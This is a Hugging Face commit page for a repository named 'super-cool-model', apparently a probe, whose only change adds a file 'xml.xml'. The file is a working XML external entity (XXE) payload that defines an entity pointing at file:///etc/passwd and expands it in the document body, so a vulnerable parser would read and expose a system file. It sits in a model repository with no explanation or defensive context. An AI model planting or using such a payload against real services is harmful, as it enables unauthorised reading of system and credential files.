Hugging Face
Models
Datasets
Spaces
Buckets
new
Docs
Enterprise
Pricing
Website
Tasks
HuggingChat
Collections
Languages
Organizations
Community
Blog
Posts
Daily Papers
Learn
Discord
Forum
GitHub
Solutions
Team & Enterprise
Hugging Face PRO
Enterprise Support
Inference Providers
Inference Endpoints
Storage Buckets
Log In
Sign Up
Hoseindb
/
super-cool-model
like
0
HuggingFaceM4/Docmatix
arxiv:
1910.09700
Model card
Files
Files and versions
xet
Community
Copy to bucket
new
Hoseindb
commited on
Jul 26, 2024
Commit
0d5c455
·
verified
·
1 Parent(s):
a075c13
Upload xml.xml
Browse files
Files changed (1)
hide
show
xml.xml
+5
-0
xml.xml
ADDED
Viewed
@@ -0,0 +1,5 @@
1
+
<?xml version="1.0"?>
2
+
<!DOCTYPE foo [
3
+
<!ENTITY xxe SYSTEM "file:///etc/passwd">
4
+
]>
5
+
<foo>&xxe;</foo>